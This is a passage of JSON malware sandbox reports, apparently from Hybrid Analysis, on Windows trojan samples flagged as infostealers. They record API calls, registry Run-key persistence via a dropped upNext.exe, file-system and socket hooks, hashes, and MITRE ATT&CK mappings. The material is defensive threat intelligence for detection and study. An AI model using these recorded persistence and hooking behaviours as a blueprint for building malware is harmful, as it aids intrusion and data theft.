"https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"FindFirstFileA\" with parameter C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.old (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"FindFirstFileA\" with parameter C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.del (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"FindFirstFileA\" with parameter C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"FindFirstFileA\" with parameter C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"855706542\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1107364946\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"855706542\"\n \"cx\": \"0\"\n \"cy\": \"25\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"Language\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"MSIE\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"must\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"brAccept\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"8859\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"7Content\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"Type\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"\n Contains base64 string in header \"form\" in header \"GET / HTTP/1.1Accept: */*Accept-Language: pt-br;pt;en-us;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Cache-Control: no-cache, must-revalidateHost: www.google.com.brAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 0Connection: close\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MSNCORE\"; Value: \"%LOCALAPPDATA%\\upNext.exe --i\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" wrote 24912 bytes starting with PE header signature to file \"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp\": 4d5a50000200000004000f00ffff0000ff0000000000000040001a0000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" wrote 24912 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\upNext.exe\": 4d5a50000200000004000f00ffff0000ff0000000000000040001a0000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"upNext.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"upNext.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\upNext.exe]- [targetUID: 00000000-00005952]\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp]- [targetUID: 00000000-00005952]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9\" has section name CODE with entropy \"6.40150010815\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9\" has section name .reloc with entropy \"6.75219683931\"\n \"upNext.exe.bin\" has section name CODE with entropy \"6.40063134674\"\n \"upNext.exe.bin\" has section name .reloc with entropy \"6.75219683931\"\n \"upNext.tmp\" has section name CODE with entropy \"6.40123755078\"\n \"upNext.tmp\" has section name .reloc with entropy \"6.75219683931\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-22", "type": 7, "relevance": 10, "name": "Uses a browser-related user-agent without launching browser", "description": "Found user-agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" opened \"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" with delete access\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" opened \"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindNextFileW@KERNEL32.DLL\" in \"upNext.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"upNext.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"upNext.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"upNext.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"upNext.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462
https://hybrid-analysis.com/sample/4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462
Hybrid Analysis - Infostealers
{"size": 1007952, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462", "sha256": "4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462", "av_detect": 93, "vx_family": "Trojan.NetMail", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates": [{"owner": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "issuer": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "serial_number": "3300000439f61f7a676da000af000000000439", "md5": "07:BA:2F:13:9D:35:45:5A:93:4A:B0:CE:D1:0C:BE:41", "sha1": "5A:25:7D:33:37:18:C4:B4:68:A5:DB:C6:64:33:48:AF:66:7A:EE:3D", "valid_from": "2021-09-02T18:25:58+00:00", "valid_until": "2022-09-01T18:25:58+00:00"}, {"owner": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "issuer": "CN=Microsoft Root Certificate Authority 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "serial_number": "610c524c000000000003", "md5": "B7:A7:B4:60:5E:33:38:9F:48:B3:3D:17:CA:E7:30:06", "sha1": "8B:FE:31:07:71:2B:3C:88:6B:1C:96:AA:EC:89:98:49:14:DC:9B:6B", "valid_from": "2010-07-06T20:40:17+00:00", "valid_until": "2025-07-06T20:50:17+00:00"}], "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 2, "total_signatures": 203, "extracted_files": [{"name": "upNext.exe", "file_path": "%LOCALAPPDATA%\\upNext.exe", "file_size": 1007952, "sha256": "a1ffebb2f4d2650116d5f5e3d6841142a3bd2c78aa5e35529dfbf1b776b8b049", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe (PID: 4224)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp", "file_path": "C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp", "file_size": 1007952, "sha256": "93b8eb36099dc0aca599db127f2fd3bf91890745bdaae0d1ea47d008823f1f92", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe (PID: 4224)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "upNext.tmp", "file_size": 1007952, "sha256": "a1ffebb2f4d2650116d5f5e3d6841142a3bd2c78aa5e35529dfbf1b776b8b049", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279804, "sha256": "c66501dc3f76466df1e4caddab202d2ce315880aa49d90266e68cfd4bf95aac5", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67A482A2.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "upNext.exe.bin", "file_size": 1007952, "sha256": "93b8eb36099dc0aca599db127f2fd3bf91890745bdaae0d1ea47d008823f1f92", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00004224", "name": "4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe", "normalized_path": "C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe", "sha256": "4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462"}, {"uid": "00000000-00004788", "name": "upNext.exe", "normalized_path": "%LOCALAPPDATA%\\upNext.exe", "command_line": "--i", "sha256": "93b8eb36099dc0aca599db127f2fd3bf91890745bdaae0d1ea47d008823f1f92"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 5, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": 